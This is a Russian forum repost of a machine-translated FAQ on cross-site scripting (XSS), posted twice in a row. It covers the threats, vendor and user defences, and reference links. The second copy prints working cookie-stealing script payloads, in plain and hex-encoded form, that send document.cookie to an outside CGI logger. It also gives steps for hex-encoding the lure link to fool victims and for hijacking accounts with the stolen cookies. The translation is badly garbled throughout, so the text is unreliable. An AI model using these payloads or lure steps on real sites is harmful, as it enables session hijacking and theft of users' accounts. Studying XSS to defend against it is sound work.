Введение
Сайты сегодня являются более сложными, чем когда-либо, содержащее много динамическое содержание решений опыт для пользователей более приятным. Динамическое содержимое достигается за счет использования веб-приложений, которые могут доставить другим выходом к пользователю в зависимости от настроек и потребностей. Динамические сайты страдают от угрозы, что статические веб-сайты не делают, называется "Cross Site Scripting" (или XSS озвученных другие профессионалы в области безопасности). В настоящее время малые информационные лакомые кусочки о Cross Site отверстия сценариев существуют, но никто на самом деле объяснить их средний человек или администратору. Этот FAQ был написан, чтобы обеспечить лучшее понимание этой новой угрозой, и дать указания по выявлению и профилактике.
"Что такое межсайтовый скриптинг"?
Крест Site Scripting (также известный как XSS) происходит, когда веб-приложение собирает вредоносный данных от пользователя. Данных, как правило, собранные в виде гиперссылки, которая содержит вредоносное содержимое в ней. Пользователь, скорее всего, нажмите на эту ссылку с другого сайта, мгновенные сообщения, или просто чтение совета веб или по электронной почте сообщение. Обычно злоумышленник будет кодировать вредоносных часть ссылка на сайт в HEX (или других методов кодирования), поэтому запрос менее подозрительно глядя на пользователя при нажатии на. После сбора данных в веб-приложении, он создает выходной страницы для пользователя, содержащий вредоносные данные, которые были изначально направлены на него, но таким образом, чтобы казалось действительным содержанием на веб-сайте. Многие популярные гостевая книга и форум программы позволяют пользователям отправлять сообщения с HTML и JavaScript, встроенного в них. Если, например, я был вошли как "Джон" и читать сообщения, "Джо", которые содержали вредоносный JavaScript в нем, то это может быть возможно для "Джо", чтобы захватить мою сессию, только читая его Доска объявлений должность. Более подробную информацию о том, как нападения, подобные этому, осуществляется через "куки кражи" подробно описаны ниже.
"Что такое XSS и CSS значит?"
Часто люди относятся к Cross Site Scripting, как CSS. Там было много путаницы с каскадными таблицами стилей (CSS) и межсайтовый скриптинг. Некоторые безопасности люди относятся к Cross Site Scripting, как XSS. Если вы слышите, кто-то говорит "я нашел отверстие XSS", они говорят о Cross Site Scripting для некоторых.
"Какие угрозы Cross Site Scripting?"
Часто злоумышленники будут вводить JavaScript, VBScript, ActiveX, HTML или Flash в уязвимое приложение, чтобы обмануть пользователя (Читайте ниже более подробную информацию) в целях сбора данных из них. Все, начиная от похищения аккаунта, изменения настроек пользователя, печенье кражи / отравления, или ложная реклама возможна. Новые вредоносные использует были обнаружены каждый день за нападения XSS. Пост ниже Бретт Мур воспитывает хороший момент в связи с "отказ в обслуживании", а потенциал "Авто-нападающий" хостов, если пользователь просто читает сообщение на доске объявлений.
http://archives.neohapsis.com/archives/vul...02-q1/0311.html
"Какие примеры Cross Site Scripting атаки?"
Один продукт с большим количеством отверстий XSS является популярной программы PHP PHPNuke. Этот продукт часто мишенью нападавших на зонд для дырок XSS из-за его популярности. Я включил несколько ссылок, соответствующих консультативных / докладов, которые были обнаружены и раскрыты только от этого продукта в одиночку. Следующая коллекция должна обеспечивать множество примеров.
http://www.cgisecurity.com/archive/php/php...e_scripting.txt
http://www.cgisecurity.com/archive/php/php...CSS_5_holes.txt
http://www.cgisecurity.com/archive/php/php...e_CSS_holes.txt
"Можете ли вы показать мне, что XSS кража куки выглядит?"
В зависимости от конкретного приложения веб некоторые из переменных и позиционирование инъекции, возможно, должны быть скорректированы. Имейте в виду следующее простом примере методологии злоумышленника. В нашем примере мы будем использовать Cross Site Scripting отверстие в периметре "A.php" под названием "переменной" через обычный запрос. Это наиболее распространенный тип Cross Site Scripting отверстие, которое существует.
Шаг 1: Ориентация
После того как вы нашли отверстие XSS в веб-приложений на веб-сайте, проверьте, если это вопросы, печенье. Если какой-либо части веб-сайт использует куки, то это возможно, чтобы украсть их из своих пользователей.
Шаг 2: Проверка
Поскольку XSS отверстия различных тем, как они эксплуатируются, некоторые тестирования необходимо будет сделать для того, чтобы сделать вывод правдоподобно. Добавляя код в скрипт, его выход будет изменена, и страница может отображаться нарушена. (Конечный результат имеет решающее значение, и злоумышленник будет сделать некоторые трогательные в код, чтобы сделать страницы отображаются нормально.) Далее вам необходимо вставить некоторые Javascript (или другой стороне клиента скриптовый язык) в URL, указывающий на часть о сайте, который остается уязвимым. Ниже я привел несколько ссылок, которые предназначены для публичного использования при тестировании для дырок XSS. Эти ссылки ниже, при нажатии на пошлем пользователя куки
Cookie кражи Javascript Примеры.
Пример использования приведен ниже.
Примечание: запрос впервые показан в ASCII, то в Hex для копирования и вставки целей.
Эти примеры "зло" Javascript мы будем использовать. Эти примеры Javascript собрать пользователей печенья, а затем отправить запрос на cgisecurity.com сайт с печенья в запросе. Мой сценарий на cgisecurity.com журналы каждого запроса и каждый печенья. Говоря простыми словами он делает следующее:
My cookie = user=zeno; id=021
My script =
Он посылает запрос на мой сайт, который выглядит следующим образом.
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021(Примечание:% 20 является шестнадцатеричной кодировки для пространства)
Это примитивный, но эффективный способ захвата печенье пользователя. График использования этой общественной сценария можно найти на сайте www.cgisecurity.com/articles/cookie-theft.log
Шаг 3: Выполнение XSS
Раздайте вашего созданного URL-адреса или использовать электронную почту или другое программное обеспечение, чтобы помочь запустить его. Убедитесь, что если вы предоставите URL для пользователей (по электронной почте, цель, или другими средствами), что вы по крайней мере HEX кодировать его. Код, очевидно, подозрительные на вид, но куча шестнадцатеричных символов может обмануть несколько человек.
В моем примере я только вперед пользователю cookie.cgi. Злоумышленник больше времени могли бы сделать несколько перенаправлений и XSS Combo, чтобы украсть куки пользователя, и возвращать их на веб-сайте, не замечая печенья кражи.
Некоторые почтовые программы могут выполнять JavaScript, на открытии сообщения или если Javascript содержится в сообщении вложения. Большие сайты, как Hotmail действительно позволяют Javascript внутри вложения, но они делают специальной обработки для предотвращения кражи куки.
Шаг 4: Что делать с этими данными
После того как вы получили пользователю выполнить XSS дыра, данные собраны и отправлены в ваш сценарий CGI. Теперь у вас есть печенье можно использовать такой инструмент, как Websleuth чтобы увидеть, если счет угон можно.
Это только ответы, а не подробной статье о краже печенья и модификации. Новый документ выпущен Давид Эндлер из iDefense переходит в более подробно на некоторых из способов автоматического запуска XSS дыр. Эта статья может быть найдена в http://www.idefense.com/XSS.html.
"Что я могу сделать, чтобы защитить себя, как поставщика?"
Это простой ответ. Никогда не доверяйте вводимой пользователем информации и всегда фильтр метасимволов. Это позволит устранить большинство атак XSS. Преобразование <и> в <и> Предлагается также, когда речь идет о сценарии выхода. Помните XSS дыры могут быть разрушительными и дорогостоящими для вашего бизнеса, если злоупотреблять. Часто злоумышленники будут раскрывать эти отверстия для общественности, которая может подорвать клиентов и доверия общественности к безопасности и конфиденциальности сайте организации. Фильтрация <и> в одиночку не решит всех Cross Site Scripting атаки. Предполагается, вы также попытка отфильтровать (и), путем перевода их на ( and ) , " to " , ' to ' , and also # and & by translating them to #(#) and & (&). Полный список лиц можно найти на http://tntluoma.com/sidebars/codes/
"Что я могу сделать, чтобы защитить себя, как пользователя?"
Самый простой способ защитить себя, как пользователь только по ссылкам с основного сайта вы хотите просмотреть. Если вы посетите один сайт и ссылки на CNN, например, вместо нажатия на его посетить главный сайт CNN и использовать свой поисковик, чтобы найти содержание. Это, возможно, ликвидировать девяносто процентов проблемы. Иногда XSS может быть выполнена автоматически при открытии электронной почты, вложения электронной почты, читать гостевую книгу, или по почте доска объявлений. Если вы планируете открытие электронной почте, или чтение сообщению общественный совет от человека, вы не знаете, будьте осторожны. Один из лучших способов защитить себя, чтобы отключить Javascript в настройках браузера. В свою очередь IE настройки безопасности "Высокий". Это может предотвратить кражу печенья, и в целом является более безопасным, что нужно сделать.
"Насколько широко распространены XSS дыр?"
Крест отверстия Site Scripting набирают популярность среди хакеров как легко отверстия, чтобы найти в больших веб-сайтов. Сайты с FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple Computer, Microsoft, ZDNet, проводной, и Newsbytes все имели той или иной форме от ошибок XSS.
Каждый месяц примерно 10-25 XSS отверстия находятся в коммерческих продуктах и консультативных публикуются объяснив угрозой.
"Ли шифрование защитить меня?"
Сайты, использующие SSL (HTTPS), никак не более защищены, чем сайты, которые не шифруются. Веб-приложения будут работать так же, как и раньше, только атака проходит в зашифрованное соединение. Люди часто думают, что они видят блокировки в браузере это означает, что все безопасно. Это просто не тот случай.
"Может XSS отверстия позволяют выполнение команд?"
XSS дыры могут позволить Javascript вставки, которые могут позволить для ограниченного исполнения. Если атакующий использовать браузер недостаток (браузер отверстия) это может быть возможным, чтобы выполнять команды на стороне клиента. Если выполнение команды было возможно это будет возможно только на стороне клиента. Говоря простым языком XSS дыры могут быть использованы, чтобы помочь использовать другие отверстия, которые могут существовать в вашем браузере.
"Что, если я не чувствую, что фиксация CSS / XSS дыра?"
По не фиксируя XSS дыра это может позволить возможного компромисса учетной записи пользователя в части вашего сайта, как они получают добавлены или обновлены. Cross Site Scripting был найден в различных крупных сайтах в последнее время и были широкую огласку. Левая без ремонта, кто-то может обнаружить его и опубликовать предупреждение о вашей компании. Это может повредить репутации Вашей компании, изображая его как Лакса по вопросам безопасности. Это, конечно, также отправляет сообщение для ваших клиентов, что вы имеем дело не с каждой проблемой, которая возникает, которая превращается в вопрос доверия. Если клиент не доверяет вам, почему бы они хотят делать бизнес с Вами?
"Какие ссылки я могу посетить, чтобы помочь мне глубже понять XSS?"
"Межсайтовый скриптинг отверстия слезами на Чистые безопасности"
http://www.usatoday.com/life/cyber/tech/20...curity-side.htm
Статья о XSS-дырок
http://www.perl.com/pub/a/2002/02/20/css.html
"CERT Advisory CA-2000-02 вредоносных тегов HTML Встроенные в клиентских запросов Web"
http://www.cert.org/advisories/CA-2000-02.html
Бумага по устранению мета-символы из Пользовательское данных в CGI скриптах.
http://www.cert.org/tech_tips/cgi_metacharacters.html
Документ о паспортной системе от Microsoft
http://eyeonsecurity.net/papers/passporthijack.html
Документ о Cookie Theft
http://www.eccentrix.com/education/b0iler/...ipt.htm#cookies
данная стотья была взята от сюда
Кому помогло жмем спасибо! и отписываемся в теме!
Сайты сегодня являются более сложными, чем когда-либо, содержащее много динамическое содержание решений опыт для пользователей более приятным. Динамическое содержимое достигается за счет использования веб-приложений, которые могут доставить другим выходом к пользователю в зависимости от настроек и потребностей. Динамические сайты страдают от угрозы, что статические веб-сайты не делают, называется "Cross Site Scripting" (или XSS озвученных другие профессионалы в области безопасности). В настоящее время малые информационные лакомые кусочки о Cross Site отверстия сценариев существуют, но никто на самом деле объяснить их средний человек или администратору. Этот FAQ был написан, чтобы обеспечить лучшее понимание этой новой угрозой, и дать указания по выявлению и профилактике.
"Что такое межсайтовый скриптинг"?
Крест Site Scripting (также известный как XSS) происходит, когда веб-приложение собирает вредоносный данных от пользователя. Данных, как правило, собранные в виде гиперссылки, которая содержит вредоносное содержимое в ней. Пользователь, скорее всего, нажмите на эту ссылку с другого сайта, мгновенные сообщения, или просто чтение совета веб или по электронной почте сообщение. Обычно злоумышленник будет кодировать вредоносных часть ссылка на сайт в HEX (или других методов кодирования), поэтому запрос менее подозрительно глядя на пользователя при нажатии на. После сбора данных в веб-приложении, он создает выходной страницы для пользователя, содержащий вредоносные данные, которые были изначально направлены на него, но таким образом, чтобы казалось действительным содержанием на веб-сайте. Многие популярные гостевая книга и форум программы позволяют пользователям отправлять сообщения с HTML и JavaScript, встроенного в них. Если, например, я был вошли как "Джон" и читать сообщения, "Джо", которые содержали вредоносный JavaScript в нем, то это может быть возможно для "Джо", чтобы захватить мою сессию, только читая его Доска объявлений должность. Более подробную информацию о том, как нападения, подобные этому, осуществляется через "куки кражи" подробно описаны ниже.
"Что такое XSS и CSS значит?"
Часто люди относятся к Cross Site Scripting, как CSS. Там было много путаницы с каскадными таблицами стилей (CSS) и межсайтовый скриптинг. Некоторые безопасности люди относятся к Cross Site Scripting, как XSS. Если вы слышите, кто-то говорит "я нашел отверстие XSS", они говорят о Cross Site Scripting для некоторых.
"Какие угрозы Cross Site Scripting?"
Часто злоумышленники будут вводить JavaScript, VBScript, ActiveX, HTML или Flash в уязвимое приложение, чтобы обмануть пользователя (Читайте ниже более подробную информацию) в целях сбора данных из них. Все, начиная от похищения аккаунта, изменения настроек пользователя, печенье кражи / отравления, или ложная реклама возможна. Новые вредоносные использует были обнаружены каждый день за нападения XSS. Пост ниже Бретт Мур воспитывает хороший момент в связи с "отказ в обслуживании", а потенциал "Авто-нападающий" хостов, если пользователь просто читает сообщение на доске объявлений.
http://archives.neohapsis.com/archives/vul...02-q1/0311.html
"Какие примеры Cross Site Scripting атаки?"
Один продукт с большим количеством отверстий XSS является популярной программы PHP PHPNuke. Этот продукт часто мишенью нападавших на зонд для дырок XSS из-за его популярности. Я включил несколько ссылок, соответствующих консультативных / докладов, которые были обнаружены и раскрыты только от этого продукта в одиночку. Следующая коллекция должна обеспечивать множество примеров.
http://www.cgisecurity.com/archive/php/php...e_scripting.txt
http://www.cgisecurity.com/archive/php/php...CSS_5_holes.txt
http://www.cgisecurity.com/archive/php/php...e_CSS_holes.txt
"Можете ли вы показать мне, что XSS кража куки выглядит?"
В зависимости от конкретного приложения веб некоторые из переменных и позиционирование инъекции, возможно, должны быть скорректированы. Имейте в виду следующее простом примере методологии злоумышленника. В нашем примере мы будем использовать Cross Site Scripting отверстие в периметре "A.php" под названием "переменной" через обычный запрос. Это наиболее распространенный тип Cross Site Scripting отверстие, которое существует.
Шаг 1: Ориентация
После того как вы нашли отверстие XSS в веб-приложений на веб-сайте, проверьте, если это вопросы, печенье. Если какой-либо части веб-сайт использует куки, то это возможно, чтобы украсть их из своих пользователей.
Шаг 2: Проверка
Поскольку XSS отверстия различных тем, как они эксплуатируются, некоторые тестирования необходимо будет сделать для того, чтобы сделать вывод правдоподобно. Добавляя код в скрипт, его выход будет изменена, и страница может отображаться нарушена. (Конечный результат имеет решающее значение, и злоумышленник будет сделать некоторые трогательные в код, чтобы сделать страницы отображаются нормально.) Далее вам необходимо вставить некоторые Javascript (или другой стороне клиента скриптовый язык) в URL, указывающий на часть о сайте, который остается уязвимым. Ниже я привел несколько ссылок, которые предназначены для публичного использования при тестировании для дырок XSS. Эти ссылки ниже, при нажатии на пошлем пользователя куки
Вам необходимо зарегистрироваться для просмотра ссылок
/ CGI-BIN / cookie.cgi и ее отображения. Если вы видите странице показаны печенья то сессии угон учетная запись пользователя может быть невозможным. Cookie кражи Javascript Примеры.
Пример использования приведен ниже.
Код:
Использование ASCII:
http://host/a.php?variable="><script>document.location='[url]http://www.cgisecurity.com/cgi-bin/cookie.cgi?[/url] '%20+document.cookie</script>
Код:
Hex Использование:
[url]http://host/a.php?variable[/url] =% 22% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e % 6c% 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3A% 2F% 2F% 77% 77% 77% 2e% 63% 67% 69% 73 % 65% 63% 75% 72% 69% 74% 79% 2e% 63% 6f% 6d% 2f% 63% 67% 69% 2D% 62% 69% 6e% 2f% 63% 6f% 6f% 6b% 69 % 65% 2e% 63% 67% 69% 3F% 27% 20% 2B% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 63% 6f% 6f% 6b% 69% 65% 3c % 2F% 73% 63% 72% 69% 70% 74% 3eПримечание: запрос впервые показан в ASCII, то в Hex для копирования и вставки целей.
Код:
1. "><script>document.location='[url]http://www.cgisecurity.com/cgi-bin/cookie.cgi?'[/url] +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location='[url]http://www.cgisecurity.com/cgi-bin/cookie.cgi?'[/url] +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
3. ><script>document.location='[url]http://www.cgisecurity.com/cgi-bin/cookie.cgi?'[/url] +document.cookie</script>
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3eЭти примеры "зло" Javascript мы будем использовать. Эти примеры Javascript собрать пользователей печенья, а затем отправить запрос на cgisecurity.com сайт с печенья в запросе. Мой сценарий на cgisecurity.com журналы каждого запроса и каждый печенья. Говоря простыми словами он делает следующее:
My cookie = user=zeno; id=021
My script =
Вам необходимо зарегистрироваться для просмотра ссылок
Он посылает запрос на мой сайт, который выглядит следующим образом.
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021(Примечание:% 20 является шестнадцатеричной кодировки для пространства)
Это примитивный, но эффективный способ захвата печенье пользователя. График использования этой общественной сценария можно найти на сайте www.cgisecurity.com/articles/cookie-theft.log
Шаг 3: Выполнение XSS
Раздайте вашего созданного URL-адреса или использовать электронную почту или другое программное обеспечение, чтобы помочь запустить его. Убедитесь, что если вы предоставите URL для пользователей (по электронной почте, цель, или другими средствами), что вы по крайней мере HEX кодировать его. Код, очевидно, подозрительные на вид, но куча шестнадцатеричных символов может обмануть несколько человек.
В моем примере я только вперед пользователю cookie.cgi. Злоумышленник больше времени могли бы сделать несколько перенаправлений и XSS Combo, чтобы украсть куки пользователя, и возвращать их на веб-сайте, не замечая печенья кражи.
Некоторые почтовые программы могут выполнять JavaScript, на открытии сообщения или если Javascript содержится в сообщении вложения. Большие сайты, как Hotmail действительно позволяют Javascript внутри вложения, но они делают специальной обработки для предотвращения кражи куки.
Шаг 4: Что делать с этими данными
После того как вы получили пользователю выполнить XSS дыра, данные собраны и отправлены в ваш сценарий CGI. Теперь у вас есть печенье можно использовать такой инструмент, как Websleuth чтобы увидеть, если счет угон можно.
Это только ответы, а не подробной статье о краже печенья и модификации. Новый документ выпущен Давид Эндлер из iDefense переходит в более подробно на некоторых из способов автоматического запуска XSS дыр. Эта статья может быть найдена в http://www.idefense.com/XSS.html.
"Что я могу сделать, чтобы защитить себя, как поставщика?"
Это простой ответ. Никогда не доверяйте вводимой пользователем информации и всегда фильтр метасимволов. Это позволит устранить большинство атак XSS. Преобразование <и> в <и> Предлагается также, когда речь идет о сценарии выхода. Помните XSS дыры могут быть разрушительными и дорогостоящими для вашего бизнеса, если злоупотреблять. Часто злоумышленники будут раскрывать эти отверстия для общественности, которая может подорвать клиентов и доверия общественности к безопасности и конфиденциальности сайте организации. Фильтрация <и> в одиночку не решит всех Cross Site Scripting атаки. Предполагается, вы также попытка отфильтровать (и), путем перевода их на ( and ) , " to " , ' to ' , and also # and & by translating them to #(#) and & (&). Полный список лиц можно найти на http://tntluoma.com/sidebars/codes/
"Что я могу сделать, чтобы защитить себя, как пользователя?"
Самый простой способ защитить себя, как пользователь только по ссылкам с основного сайта вы хотите просмотреть. Если вы посетите один сайт и ссылки на CNN, например, вместо нажатия на его посетить главный сайт CNN и использовать свой поисковик, чтобы найти содержание. Это, возможно, ликвидировать девяносто процентов проблемы. Иногда XSS может быть выполнена автоматически при открытии электронной почты, вложения электронной почты, читать гостевую книгу, или по почте доска объявлений. Если вы планируете открытие электронной почте, или чтение сообщению общественный совет от человека, вы не знаете, будьте осторожны. Один из лучших способов защитить себя, чтобы отключить Javascript в настройках браузера. В свою очередь IE настройки безопасности "Высокий". Это может предотвратить кражу печенья, и в целом является более безопасным, что нужно сделать.
"Насколько широко распространены XSS дыр?"
Крест отверстия Site Scripting набирают популярность среди хакеров как легко отверстия, чтобы найти в больших веб-сайтов. Сайты с FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple Computer, Microsoft, ZDNet, проводной, и Newsbytes все имели той или иной форме от ошибок XSS.
Каждый месяц примерно 10-25 XSS отверстия находятся в коммерческих продуктах и консультативных публикуются объяснив угрозой.
"Ли шифрование защитить меня?"
Сайты, использующие SSL (HTTPS), никак не более защищены, чем сайты, которые не шифруются. Веб-приложения будут работать так же, как и раньше, только атака проходит в зашифрованное соединение. Люди часто думают, что они видят блокировки в браузере это означает, что все безопасно. Это просто не тот случай.
"Может XSS отверстия позволяют выполнение команд?"
XSS дыры могут позволить Javascript вставки, которые могут позволить для ограниченного исполнения. Если атакующий использовать браузер недостаток (браузер отверстия) это может быть возможным, чтобы выполнять команды на стороне клиента. Если выполнение команды было возможно это будет возможно только на стороне клиента. Говоря простым языком XSS дыры могут быть использованы, чтобы помочь использовать другие отверстия, которые могут существовать в вашем браузере.
"Что, если я не чувствую, что фиксация CSS / XSS дыра?"
По не фиксируя XSS дыра это может позволить возможного компромисса учетной записи пользователя в части вашего сайта, как они получают добавлены или обновлены. Cross Site Scripting был найден в различных крупных сайтах в последнее время и были широкую огласку. Левая без ремонта, кто-то может обнаружить его и опубликовать предупреждение о вашей компании. Это может повредить репутации Вашей компании, изображая его как Лакса по вопросам безопасности. Это, конечно, также отправляет сообщение для ваших клиентов, что вы имеем дело не с каждой проблемой, которая возникает, которая превращается в вопрос доверия. Если клиент не доверяет вам, почему бы они хотят делать бизнес с Вами?
"Какие ссылки я могу посетить, чтобы помочь мне глубже понять XSS?"
"Межсайтовый скриптинг отверстия слезами на Чистые безопасности"
http://www.usatoday.com/life/cyber/tech/20...curity-side.htm
Статья о XSS-дырок
http://www.perl.com/pub/a/2002/02/20/css.html
"CERT Advisory CA-2000-02 вредоносных тегов HTML Встроенные в клиентских запросов Web"
http://www.cert.org/advisories/CA-2000-02.html
Бумага по устранению мета-символы из Пользовательское данных в CGI скриптах.
http://www.cert.org/tech_tips/cgi_metacharacters.html
Документ о паспортной системе от Microsoft
http://eyeonsecurity.net/papers/passporthijack.html
Документ о Cookie Theft
http://www.eccentrix.com/education/b0iler/...ipt.htm#cookies
данная стотья была взята от сюда
Кому помогло жмем спасибо! и отписываемся в теме!
, может быть ты и не добьешь, а вот остальные добьются.